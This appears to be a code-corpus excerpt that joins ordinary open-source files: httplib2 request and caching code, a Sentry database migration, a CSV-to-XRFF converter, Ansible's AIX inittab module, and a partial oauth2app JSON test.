redirect_method = method
if response.status in [302, 303]:
redirect_method = "GET"
body = None
(response, content) = self.request(location, redirect_method, body=body, headers = headers, redirections = redirections - 1)
response.previous = old_response
else:
raise RedirectLimit("Redirected more times than rediection_limit allows.", response, content)
elif response.status in [200, 203] and method in ["GET", "HEAD"]:
# Don't cache 206's since we aren't going to handle byte range requests
if not response.has_key('content-location'):
response['content-location'] = absolute_uri
_updateCache(headers, response, content, self.cache, cachekey)
return (response, content)
def _normalize_headers(self, headers):
return _normalize_headers(headers)
# Need to catch and rebrand some exceptions
# Then need to optionally turn all exceptions into status codes
# including all socket.* and httplib.* exceptions.
def request(self, uri, method="GET", body=None, headers=None, redirections=DEFAULT_MAX_REDIRECTS, connection_type=None):
""" Performs a single HTTP request.
The 'uri' is the URI of the HTTP resource and can begin with either
'http' or 'https'. The value of 'uri' must be an absolute URI.
The 'method' is the HTTP method to perform, such as GET, POST, DELETE,
etc. There is no restriction on the methods allowed.
The 'body' is the entity body to be sent with the request. It is a
string object.
Any extra headers that are to be sent with the request should be
provided in the 'headers' dictionary.
The maximum number of redirects to follow before raising an
exception is 'redirections'. The default is 5.
The return value is a tuple of (response, content), the first
being an instance of the 'Response' class, the second being
a string that contains the response entity body.
"""
try:
if headers is None:
headers = {}
else:
headers = self._normalize_headers(headers)
if not headers.has_key('user-agent'):
headers['user-agent'] = "Python-httplib2/%s (gzip)" % __version__
uri = iri2uri(uri)
(scheme, authority, request_uri, defrag_uri) = urlnorm(uri)
domain_port = authority.split(":")[0:2]
if len(domain_port) == 2 and domain_port[1] == '443' and scheme == 'http':
scheme = 'https'
authority = domain_port[0]
proxy_info = self._get_proxy_info(scheme, authority)
conn_key = scheme+":"+authority
if conn_key in self.connections:
conn = self.connections[conn_key]
else:
if not connection_type:
connection_type = SCHEME_TO_CONNECTION[scheme]
certs = list(self.certificates.iter(authority))
if scheme == 'https':
if certs:
conn = self.connections[conn_key] = connection_type(
authority, key_file=certs[0][0],
cert_file=certs[0][1], timeout=self.timeout,
proxy_info=proxy_info,
ca_certs=self.ca_certs,
disable_ssl_certificate_validation=
self.disable_ssl_certificate_validation)
else:
conn = self.connections[conn_key] = connection_type(
authority, timeout=self.timeout,
proxy_info=proxy_info,
ca_certs=self.ca_certs,
disable_ssl_certificate_validation=
self.disable_ssl_certificate_validation)
else:
conn = self.connections[conn_key] = connection_type(
authority, timeout=self.timeout,
proxy_info=proxy_info)
conn.set_debuglevel(debuglevel)
if 'range' not in headers and 'accept-encoding' not in headers:
headers['accept-encoding'] = 'gzip, deflate'
info = email.Message.Message()
cached_value = None
if self.cache:
cachekey = defrag_uri
cached_value = self.cache.get(cachekey)
if cached_value:
# info = email.message_from_string(cached_value)
#
# Need to replace the line above with the kludge below
# to fix the non-existent bug not fixed in this
# bug report: http://mail.python.org/pipermail/python-bugs-list/2005-September/030289.html
try:
info, content = cached_value.split('\r\n\r\n', 1)
feedparser = email.FeedParser.FeedParser()
feedparser.feed(info)
info = feedparser.close()
feedparser._parse = None
except (IndexError, ValueError):
self.cache.delete(cachekey)
cachekey = None
cached_value = None
else:
cachekey = None
if method in self.optimistic_concurrency_methods and self.cache and info.has_key('etag') and not self.ignore_etag and 'if-match' not in headers:
# http://www.w3.org/1999/04/Editing/
headers['if-match'] = info['etag']
if method not in ["GET", "HEAD"] and self.cache and cachekey:
# RFC 2616 Section 13.10
self.cache.delete(cachekey)
# Check the vary header in the cache to see if this request
# matches what varies in the cache.
if method in ['GET', 'HEAD'] and 'vary' in info:
vary = info['vary']
vary_headers = vary.lower().replace(' ', '').split(',')
for header in vary_headers:
key = '-varied-%s' % header
value = info[key]
if headers.get(header, None) != value:
cached_value = None
break
if cached_value and method in ["GET", "HEAD"] and self.cache and 'range' not in headers:
if info.has_key('-x-permanent-redirect-url'):
# Should cached permanent redirects be counted in our redirection count? For now, yes.
if redirections <= 0:
raise RedirectLimit("Redirected more times than redirection_limit allows.", {}, "")
(response, new_content) = self.request(info['-x-permanent-redirect-url'], "GET", headers = headers, redirections = redirections - 1)
response.previous = Response(info)
response.previous.fromcache = True
else:
# Determine our course of action:
# Is the cached entry fresh or stale?
# Has the client requested a non-cached response?
#
# There seem to be three possible answers:
# 1. [FRESH] Return the cache entry w/o doing a GET
# 2. [STALE] Do the GET (but add in cache validators if available)
# 3. [TRANSPARENT] Do a GET w/o any cache validators (Cache-Control: no-cache) on the request
entry_disposition = _entry_disposition(info, headers)
if entry_disposition == "FRESH":
if not cached_value:
info['status'] = '504'
content = ""
response = Response(info)
if cached_value:
response.fromcache = True
return (response, content)
if entry_disposition == "STALE":
if info.has_key('etag') and not self.ignore_etag and not 'if-none-match' in headers:
headers['if-none-match'] = info['etag']
if info.has_key('last-modified') and not 'last-modified' in headers:
headers['if-modified-since'] = info['last-modified']
elif entry_disposition == "TRANSPARENT":
pass
(response, new_content) = self._request(conn, authority, uri, request_uri, method, body, headers, redirections, cachekey)
if response.status == 304 and method == "GET":
# Rewrite the cache entry with the new end-to-end headers
# Take all headers that are in response
# and overwrite their values in info.
# unless they are hop-by-hop, or are listed in the connection header.
for key in _get_end2end_headers(response):
info[key] = response[key]
merged_response = Response(info)
if hasattr(response, "_stale_digest"):
merged_response._stale_digest = response._stale_digest
_updateCache(headers, merged_response, content, self.cache, cachekey)
response = merged_response
response.status = 200
response.fromcache = True
elif response.status == 200:
content = new_content
else:
self.cache.delete(cachekey)
content = new_content
else:
cc = _parse_cache_control(headers)
if cc.has_key('only-if-cached'):
info['status'] = '504'
response = Response(info)
content = ""
else:
(response, content) = self._request(conn, authority, uri, request_uri, method, body, headers, redirections, cachekey)
except Exception, e:
if self.force_exception_to_status_code:
if isinstance(e, HttpLib2ErrorWithResponse):
response = e.response
content = e.content
response.status = 500
response.reason = str(e)
elif isinstance(e, socket.timeout):
content = "Request Timeout"
response = Response({
"content-type": "text/plain",
"status": "408",
"content-length": len(content)
})
response.reason = "Request Timeout"
else:
content = str(e)
response = Response({
"content-type": "text/plain",
"status": "400",
"content-length": len(content)
})
response.reason = "Bad Request"
else:
raise
return (response, content)
def _get_proxy_info(self, scheme, authority):
"""Return a ProxyInfo instance (or None) based on the scheme
and authority.
"""
hostname, port = urllib.splitport(authority)
proxy_info = self.proxy_info
if callable(proxy_info):
proxy_info = proxy_info(scheme)
if (hasattr(proxy_info, 'applies_to')
and not proxy_info.applies_to(hostname)):
proxy_info = None
return proxy_info
class Response(dict):
"""An object more like email.Message than httplib.HTTPResponse."""
"""Is this response from our local cache"""
fromcache = False
"""HTTP protocol version used by server. 10 for HTTP/1.0, 11 for HTTP/1.1. """
version = 11
"Status code returned by server. "
status = 200
"""Reason phrase returned by server."""
reason = "Ok"
previous = None
def __init__(self, info):
# info is either an email.Message or
# an httplib.HTTPResponse object.
if isinstance(info, httplib.HTTPResponse):
for key, value in info.getheaders():
self[key.lower()] = value
self.status = info.status
self['status'] = str(self.status)
self.reason = info.reason
self.version = info.version
elif isinstance(info, email.Message.Message):
for key, value in info.items():
self[key.lower()] = value
self.status = int(self['status'])
else:
for key, value in info.iteritems():
self[key.lower()] = value
self.status = int(self.get('status', self.status))
self.reason = self.get('reason', self.reason)
def __getattr__(self, name):
if name == 'dict':
return self
else:
raise AttributeError, name
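# Illustrative sketch (not part of the library): a Response built from a
# plain dict behaves like a mapping of lower-cased header names with the
# parsed status layered on top.
#   resp = Response({"status": "200", "content-type": "text/plain"})
#   assert resp.status == 200
#   assert resp["content-type"] == "text/plain"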
| epl-1.0 |
wong2/sentry | src/sentry/migrations/0038_auto__add_searchtoken__add_unique_searchtoken_document_field_token__ad.py | 36 | 17201 | # encoding: utf-8
import datetime
from south.db import db
from south.v2 import SchemaMigration
from django.db import models
class Migration(SchemaMigration):
def forwards(self, orm):
# Adding model 'SearchToken'
db.create_table('sentry_searchtoken', (
('id', self.gf('sentry.db.models.fields.bounded.BoundedBigAutoField')(primary_key=True)),
('document', self.gf('sentry.db.models.fields.FlexibleForeignKey')(related_name='token_set', to=orm['sentry.SearchDocument'])),
('field', self.gf('django.db.models.fields.CharField')(default='text', max_length=64)),
('token', self.gf('django.db.models.fields.CharField')(max_length=128)),
('times_seen', self.gf('django.db.models.fields.PositiveIntegerField')(default=1)),
))
db.send_create_signal('sentry', ['SearchToken'])
# Adding unique constraint on 'SearchToken', fields ['document', 'field', 'token']
db.create_unique('sentry_searchtoken', ['document_id', 'field', 'token'])
# Adding model 'SearchDocument'
db.create_table('sentry_searchdocument', (
('id', self.gf('sentry.db.models.fields.bounded.BoundedBigAutoField')(primary_key=True)),
('project', self.gf('sentry.db.models.fields.FlexibleForeignKey')(to=orm['sentry.Project'])),
('group', self.gf('sentry.db.models.fields.FlexibleForeignKey')(to=orm['sentry.Group'])),
('total_events', self.gf('django.db.models.fields.PositiveIntegerField')(default=1)),
('date_added', self.gf('django.db.models.fields.DateTimeField')(default=datetime.datetime.now)),
('date_changed', self.gf('django.db.models.fields.DateTimeField')(default=datetime.datetime.now)),
))
db.send_create_signal('sentry', ['SearchDocument'])
# Adding unique constraint on 'SearchDocument', fields ['project', 'group']
db.create_unique('sentry_searchdocument', ['project_id', 'group_id'])
def backwards(self, orm):
# Removing unique constraint on 'SearchDocument', fields ['project', 'group']
db.delete_unique('sentry_searchdocument', ['project_id', 'group_id'])
# Removing unique constraint on 'SearchToken', fields ['document', 'field', 'token']
db.delete_unique('sentry_searchtoken', ['document_id', 'field', 'token'])
# Deleting model 'SearchToken'
db.delete_table('sentry_searchtoken')
# Deleting model 'SearchDocument'
db.delete_table('sentry_searchdocument')
models = {
'sentry.user': {
'Meta': {'object_name': 'User', 'db_table': "'auth_user'"},
'date_joined': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'email': ('django.db.models.fields.EmailField', [], {'max_length': '75', 'blank': 'True'}),
'first_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'is_active': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'is_staff': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'is_superuser': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'last_login': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'last_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
'password': ('django.db.models.fields.CharField', [], {'max_length': '128'}),
'username': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '30'})
},
'contenttypes.contenttype': {
'Meta': {'ordering': "('name',)", 'unique_together': "(('app_label', 'model'),)", 'object_name': 'ContentType', 'db_table': "'django_content_type'"},
'app_label': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'model': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '100'})
},
'sentry.event': {
'Meta': {'object_name': 'Event', 'db_table': "'sentry_message'"},
'checksum': ('django.db.models.fields.CharField', [], {'max_length': '32', 'db_index': 'True'}),
'culprit': ('django.db.models.fields.CharField', [], {'max_length': '200', 'null': 'True', 'db_column': "'view'", 'blank': 'True'}),
'data': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
'datetime': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now', 'db_index': 'True'}),
'event_id': ('django.db.models.fields.CharField', [], {'max_length': '32', 'unique': 'True', 'null': 'True', 'db_column': "'message_id'"}),
'group': ('sentry.db.models.fields.FlexibleForeignKey', [], {'blank': 'True', 'related_name': "'event_set'", 'null': 'True', 'to': "orm['sentry.Group']"}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'level': ('django.db.models.fields.PositiveIntegerField', [], {'default': '40', 'db_index': 'True', 'blank': 'True'}),
'logger': ('django.db.models.fields.CharField', [], {'default': "'root'", 'max_length': '64', 'db_index': 'True', 'blank': 'True'}),
'message': ('django.db.models.fields.TextField', [], {}),
'project': ('sentry.db.models.fields.FlexibleForeignKey', [], {'to': "orm['sentry.Project']", 'null': 'True'}),
'server_name': ('django.db.models.fields.CharField', [], {'max_length': '128', 'null': 'True', 'db_index': 'True'}),
'site': ('django.db.models.fields.CharField', [], {'max_length': '128', 'null': 'True', 'db_index': 'True'}),
'time_spent': ('django.db.models.fields.FloatField', [], {'null': 'True'})
},
'sentry.filtervalue': {
'Meta': {'unique_together': "(('project', 'key', 'value'),)", 'object_name': 'FilterValue'},
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'key': ('django.db.models.fields.CharField', [], {'max_length': '32'}),
'project': ('sentry.db.models.fields.FlexibleForeignKey', [], {'to': "orm['sentry.Project']", 'null': 'True'}),
'value': ('django.db.models.fields.CharField', [], {'max_length': '200'})
},
'sentry.group': {
'Meta': {'unique_together': "(('project', 'logger', 'culprit', 'checksum'),)", 'object_name': 'Group', 'db_table': "'sentry_groupedmessage'"},
'checksum': ('django.db.models.fields.CharField', [], {'max_length': '32', 'db_index': 'True'}),
'culprit': ('django.db.models.fields.CharField', [], {'max_length': '200', 'null': 'True', 'db_column': "'view'", 'blank': 'True'}),
'data': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
'first_seen': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now', 'db_index': 'True'}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'last_seen': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now', 'db_index': 'True'}),
'level': ('django.db.models.fields.PositiveIntegerField', [], {'default': '40', 'db_index': 'True', 'blank': 'True'}),
'logger': ('django.db.models.fields.CharField', [], {'default': "'root'", 'max_length': '64', 'db_index': 'True', 'blank': 'True'}),
'message': ('django.db.models.fields.TextField', [], {}),
'project': ('sentry.db.models.fields.FlexibleForeignKey', [], {'to': "orm['sentry.Project']", 'null': 'True'}),
'score': ('django.db.models.fields.IntegerField', [], {'default': '0'}),
'status': ('django.db.models.fields.PositiveIntegerField', [], {'default': '0', 'db_index': 'True'}),
'time_spent_count': ('django.db.models.fields.IntegerField', [], {'default': '0'}),
'time_spent_total': ('django.db.models.fields.FloatField', [], {'default': '0'}),
'times_seen': ('django.db.models.fields.PositiveIntegerField', [], {'default': '1', 'db_index': 'True'}),
'views': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['sentry.View']", 'symmetrical': 'False', 'blank': 'True'})
},
'sentry.groupbookmark': {
'Meta': {'unique_together': "(('project', 'user', 'group'),)", 'object_name': 'GroupBookmark'},
'group': ('sentry.db.models.fields.FlexibleForeignKey', [], {'related_name': "'bookmark_set'", 'to': "orm['sentry.Group']"}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'project': ('sentry.db.models.fields.FlexibleForeignKey', [], {'related_name': "'bookmark_set'", 'to': "orm['sentry.Project']"}),
'user': ('sentry.db.models.fields.FlexibleForeignKey', [], {'related_name': "'sentry_bookmark_set'", 'to': "orm['sentry.User']"})
},
'sentry.groupmeta': {
'Meta': {'unique_together': "(('group', 'key'),)", 'object_name': 'GroupMeta'},
'group': ('sentry.db.models.fields.FlexibleForeignKey', [], {'to': "orm['sentry.Group']"}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'key': ('django.db.models.fields.CharField', [], {'max_length': '64'}),
'value': ('django.db.models.fields.TextField', [], {})
},
'sentry.messagecountbyminute': {
'Meta': {'unique_together': "(('project', 'group', 'date'),)", 'object_name': 'MessageCountByMinute'},
'date': ('django.db.models.fields.DateTimeField', [], {}),
'group': ('sentry.db.models.fields.FlexibleForeignKey', [], {'to': "orm['sentry.Group']"}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'project': ('sentry.db.models.fields.FlexibleForeignKey', [], {'to': "orm['sentry.Project']", 'null': 'True'}),
'time_spent_count': ('django.db.models.fields.IntegerField', [], {'default': '0'}),
'time_spent_total': ('django.db.models.fields.FloatField', [], {'default': '0'}),
'times_seen': ('django.db.models.fields.PositiveIntegerField', [], {'default': '0'})
},
'sentry.messagefiltervalue': {
'Meta': {'unique_together': "(('project', 'key', 'value', 'group'),)", 'object_name': 'MessageFilterValue'},
'group': ('sentry.db.models.fields.FlexibleForeignKey', [], {'to': "orm['sentry.Group']"}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'key': ('django.db.models.fields.CharField', [], {'max_length': '32'}),
'project': ('sentry.db.models.fields.FlexibleForeignKey', [], {'to': "orm['sentry.Project']", 'null': 'True'}),
'times_seen': ('django.db.models.fields.PositiveIntegerField', [], {'default': '0'}),
'value': ('django.db.models.fields.CharField', [], {'max_length': '200'})
},
'sentry.messageindex': {
'Meta': {'unique_together': "(('column', 'value', 'object_id'),)", 'object_name': 'MessageIndex'},
'column': ('django.db.models.fields.CharField', [], {'max_length': '32'}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'object_id': ('django.db.models.fields.PositiveIntegerField', [], {}),
'value': ('django.db.models.fields.CharField', [], {'max_length': '128'})
},
'sentry.option': {
'Meta': {'object_name': 'Option'},
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'key': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '64'}),
'value': ('django.db.models.fields.TextField', [], {})
},
'sentry.project': {
'Meta': {'object_name': 'Project'},
'date_added': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '200'}),
'owner': ('sentry.db.models.fields.FlexibleForeignKey', [], {'related_name': "'owned_project_set'", 'null': 'True', 'to': "orm['sentry.User']"}),
'public': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'status': ('django.db.models.fields.PositiveIntegerField', [], {'default': '0', 'db_index': 'True'})
},
'sentry.projectdomain': {
'Meta': {'unique_together': "(('project', 'domain'),)", 'object_name': 'ProjectDomain'},
'domain': ('django.db.models.fields.CharField', [], {'max_length': '128'}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'project': ('sentry.db.models.fields.FlexibleForeignKey', [], {'related_name': "'domain_set'", 'to': "orm['sentry.Project']"})
},
'sentry.projectmember': {
'Meta': {'unique_together': "(('project', 'user'),)", 'object_name': 'ProjectMember'},
'date_added': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'project': ('sentry.db.models.fields.FlexibleForeignKey', [], {'related_name': "'member_set'", 'to': "orm['sentry.Project']"}),
'public_key': ('django.db.models.fields.CharField', [], {'max_length': '32', 'unique': 'True', 'null': 'True'}),
'secret_key': ('django.db.models.fields.CharField', [], {'max_length': '32', 'unique': 'True', 'null': 'True'}),
'type': ('django.db.models.fields.IntegerField', [], {'default': '0'}),
'user': ('sentry.db.models.fields.FlexibleForeignKey', [], {'related_name': "'project_set'", 'to': "orm['sentry.User']"})
},
'sentry.projectoption': {
'Meta': {'unique_together': "(('project', 'key'),)", 'object_name': 'ProjectOption', 'db_table': "'sentry_projectoptions'"},
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'key': ('django.db.models.fields.CharField', [], {'max_length': '64'}),
'project': ('sentry.db.models.fields.FlexibleForeignKey', [], {'to': "orm['sentry.Project']"}),
'value': ('django.db.models.fields.TextField', [], {})
},
'sentry.searchdocument': {
'Meta': {'unique_together': "(('project', 'group'),)", 'object_name': 'SearchDocument'},
'date_added': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'date_changed': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'group': ('sentry.db.models.fields.FlexibleForeignKey', [], {'to': "orm['sentry.Group']"}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'project': ('sentry.db.models.fields.FlexibleForeignKey', [], {'to': "orm['sentry.Project']"}),
'total_events': ('django.db.models.fields.PositiveIntegerField', [], {'default': '1'})
},
'sentry.searchtoken': {
'Meta': {'unique_together': "(('document', 'field', 'token'),)", 'object_name': 'SearchToken'},
'document': ('sentry.db.models.fields.FlexibleForeignKey', [], {'related_name': "'token_set'", 'to': "orm['sentry.SearchDocument']"}),
'field': ('django.db.models.fields.CharField', [], {'default': "'text'", 'max_length': '64'}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'times_seen': ('django.db.models.fields.PositiveIntegerField', [], {'default': '1'}),
'token': ('django.db.models.fields.CharField', [], {'max_length': '128'})
},
'sentry.view': {
'Meta': {'object_name': 'View'},
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'path': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '100'}),
'verbose_name': ('django.db.models.fields.CharField', [], {'max_length': '200', 'null': 'True'}),
'verbose_name_plural': ('django.db.models.fields.CharField', [], {'max_length': '200', 'null': 'True'})
}
}
complete_apps = ['sentry']
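# Illustrative application sketch (assumes a south-enabled Django project;
# the exact manage.py invocation is an assumption):
#   python manage.py migrate sentry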
| bsd-3-clause |
morinim/vita | src/examples/sr/csv2xrff.py | 1 | 3344 | #!/usr/bin/env python3
#
# Copyright (C) 2011 EOS di Manlio Morini.
#
# This Source Code Form is subject to the terms of the Mozilla Public
# License, v. 2.0. If a copy of the MPL was not distributed with this file,
# You can obtain one at http://mozilla.org/MPL/2.0/
#
import argparse
import csv
import os
from xml.etree.ElementTree import Element, ElementTree, SubElement
verbose = False
def is_number(s):
try:
float(s)
return True
except ValueError:
return False
def csv_to_xrff(args):
# Many tips for Element / SubElement manipulation in:
# <http://effbot.org/zone/element.htm#reading-and-writing-xml-files>
# Build the xrff skeleton.
xrff = Element("dataset", name=os.path.splitext(args.xrff_file)[0])
header = SubElement(xrff, "header")
body = SubElement(xrff, "body")
attributes = SubElement(header, "attributes")
instances = SubElement(body, "instances")
# Sniff the csv file dialect.
csv_file = open(args.csv_file, newline='')
dialect = csv.Sniffer().sniff(csv_file.read(1024))
csv_file.seek(0)
csv_reader = csv.reader(csv_file, dialect)
number = []
for i, row in enumerate(csv_reader):
instance = SubElement(instances, "instance")
for j, field in enumerate(row):
if i == 0:
if is_number(field):
arg_type = "numeric"
number.append(True)
else:
arg_type = "string"
number.append(False)
attribute = SubElement(attributes, "attribute", type=arg_type)
if j == args.class_column:
attribute.set("class", "yes")
value = SubElement(instance, "value")
if (number[j]):
value.text = field
else:
value.text = '"' + field + '"'
# Note that the standard element writer creates a compact output. There is
# no built-in support for pretty printing or user-defined namespace
# prefixes in the current version, so the output may not always be suitable
# for human consumption (to the extent XML is suitable for human
# consumption, that is).
# SOLUTION 1 (Unix)
# xmllint --format ugly.xml > pretty.xml
# SOLUTION 2
# from xml.etree.ElementTree import tostring
# def prettify(elem):
# rough_string = tostring(elem)
# reparsed = minidom.parseString(rough_string)
# return reparsed.toprettyxml(indent=" ")
# print(prettify(xrff))
ElementTree(xrff).write(args.xrff_file)
def get_cmd_line_options():
description = "Convert a file from CSV data format to XRFF."
parser = argparse.ArgumentParser(description=description)
parser.add_argument("-v", "--verbose", action="store_true",
help="Turn on verbose mode")
parser.add_argument("-c", "--class_column", type=int, default=0,
help="Which attribute should act as class attribute?")
parser.add_argument("csv_file")
parser.add_argument("xrff_file")
return parser
def main():
# Get argument flags and command options
parser = get_cmd_line_options()
args = parser.parse_args()
verbose = args.verbose
csv_to_xrff(args)
if __name__ == "__main__":
main()
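# Illustrative invocation (hypothetical file names), based on the argparse
# options defined above:
#   python3 csv2xrff.py --class_column 0 data.csv data.xrff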
| mpl-2.0 |
toshywoshy/ansible | lib/ansible/modules/system/aix_inittab.py | 43 | 7431 | #!/usr/bin/python
# -*- coding: utf-8 -*-
# Copyright: (c) 2017, Joris Weijters <[email protected]>
# GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)
from __future__ import absolute_import, division, print_function
__metaclass__ = type
ANSIBLE_METADATA = {'metadata_version': '1.1',
'status': ['preview'],
'supported_by': 'community'}
DOCUMENTATION = r'''
---
author:
- Joris Weijters (@molekuul)
module: aix_inittab
short_description: Manages the inittab on AIX
description:
- Manages the inittab on AIX.
version_added: "2.3"
options:
name:
description:
- Name of the inittab entry.
type: str
required: yes
aliases: [ service ]
runlevel:
description:
- Runlevel of the entry.
type: str
required: yes
action:
description:
- Action what the init has to do with this entry.
type: str
required: yes
choices:
- boot
- bootwait
- hold
- initdefault
- 'off'
- once
- ondemand
- powerfail
- powerwait
- respawn
- sysinit
- wait
command:
description:
- What command has to run.
type: str
required: yes
insertafter:
description:
- After which inittab line the new entry should be inserted.
type: str
state:
description:
- Whether the entry should be present or absent in the inittab file.
type: str
choices: [ absent, present ]
default: present
notes:
- The changes are persistent across reboots.
- You need root rights to read or adjust the inittab with the C(lsitab), C(chitab), C(mkitab) or C(rmitab) commands.
- Tested on AIX 7.1.
requirements:
- itertools
'''
EXAMPLES = '''
# Add service startmyservice to the inittab, directly after service existingservice.
- name: Add startmyservice to inittab
aix_inittab:
name: startmyservice
runlevel: 4
action: once
command: echo hello
insertafter: existingservice
state: present
become: yes
# Change inittab entry startmyservice to runlevel "2" and processaction "wait".
- name: Change startmyservice to inittab
aix_inittab:
name: startmyservice
runlevel: 2
action: wait
command: echo hello
state: present
become: yes
- name: Remove startmyservice from inittab
aix_inittab:
name: startmyservice
runlevel: 2
action: wait
command: echo hello
state: absent
become: yes
'''
RETURN = '''
name:
description: Name of the adjusted inittab entry
returned: always
type: str
sample: startmyservice
msg:
description: Action done with the inittab entry
returned: changed
type: str
sample: changed inittab entry startmyservice
changed:
description: Whether the inittab changed or not
returned: always
type: bool
sample: true
'''
# Import necessary libraries
try:
# python 2
from itertools import izip
except ImportError:
izip = zip
from ansible.module_utils.basic import AnsibleModule
# end import modules
# start defining the functions
def check_current_entry(module):
# Check whether the entry exists. If not, return {'exist': False};
# if it does, return {'exist': True} plus the parsed entry fields.
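# A matching `lsitab <name>` line is colon-separated as
# name:runlevel:action:command, e.g. (hypothetical entry):
#   startmyservice:4:once:echo hello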
existsdict = {'exist': False}
lsitab = module.get_bin_path('lsitab')
(rc, out, err) = module.run_command([lsitab, module.params['name']])
if rc == 0:
keys = ('name', 'runlevel', 'action', 'command')
values = out.split(":")
# strip non-printable characters such as \n
values = map(lambda s: s.strip(), values)
existsdict = dict(izip(keys, values))
existsdict.update({'exist': True})
return existsdict
def main():
# initialize
module = AnsibleModule(
argument_spec=dict(
name=dict(type='str', required=True, aliases=['service']),
runlevel=dict(type='str', required=True),
action=dict(type='str', choices=[
'boot',
'bootwait',
'hold',
'initdefault',
'off',
'once',
'ondemand',
'powerfail',
'powerwait',
'respawn',
'sysinit',
'wait',
]),
command=dict(type='str', required=True),
insertafter=dict(type='str'),
state=dict(type='str', default='present', choices=['absent', 'present']),
),
supports_check_mode=True,
)
result = {
'name': module.params['name'],
'changed': False,
'msg': ""
}
# Find commandline strings
mkitab = module.get_bin_path('mkitab')
rmitab = module.get_bin_path('rmitab')
chitab = module.get_bin_path('chitab')
rc = 0
# check if the new entry exists
current_entry = check_current_entry(module)
# if action is install or change,
if module.params['state'] == 'present':
# create new entry string
new_entry = module.params['name'] + ":" + module.params['runlevel'] + \
":" + module.params['action'] + ":" + module.params['command']
# If the entry does not exist, or any of its fields differ, the
# entry will be created or changed below.
if (not current_entry['exist']) or (
module.params['runlevel'] != current_entry['runlevel'] or
module.params['action'] != current_entry['action'] or
module.params['command'] != current_entry['command']):
# If the entry does exist then change the entry
if current_entry['exist']:
if not module.check_mode:
(rc, out, err) = module.run_command([chitab, new_entry])
if rc != 0:
module.fail_json(
msg="could not change inittab", rc=rc, err=err)
result['msg'] = "changed inittab entry" + " " + current_entry['name']
result['changed'] = True
# If the entry does not exist create the entry
elif not current_entry['exist']:
if module.params['insertafter']:
if not module.check_mode:
(rc, out, err) = module.run_command(
[mkitab, '-i', module.params['insertafter'], new_entry])
else:
if not module.check_mode:
(rc, out, err) = module.run_command(
[mkitab, new_entry])
if rc != 0:
module.fail_json(msg="could not adjust inittab", rc=rc, err=err)
result['msg'] = "add inittab entry" + " " + module.params['name']
result['changed'] = True
elif module.params['state'] == 'absent':
# If the action is remove and the entry exists then remove the entry
if current_entry['exist']:
if not module.check_mode:
(rc, out, err) = module.run_command(
[rmitab, module.params['name']])
if rc != 0:
module.fail_json(
msg="could not remove entry grom inittab)", rc=rc, err=err)
result['msg'] = "removed inittab entry" + " " + current_entry['name']
result['changed'] = True
module.exit_json(**result)
if __name__ == '__main__':
main()
| gpl-3.0 |
hiidef/oauth2app | tests/testsite/apps/api/tests/json.py | 4 | 1225 | #-*- coding: utf-8 -*-
try: import simplejson as json
except ImportError: import json
from .base import *
class JSONTestCase(BaseTestCase):
def test_00_email(self):
client = DjangoTestClient()
token = self.get_token()
# Sufficient scope.
response = client.get(
"/api/email_json",
{},
HTTP_AUTHORIZATION="Bearer %s" % token)
self.assertEqual(response.status_code, 200)
self.assertEqual(json.loads(response.content)["email"], USER_EMAIL)
response = client.get(
"/api/email_json?callback=foo",
{},
HTTP_AUTHORIZATION="Bearer %s" % token)
self.assertEqual(response.status_code, 200)
# Remove the JSON callback.
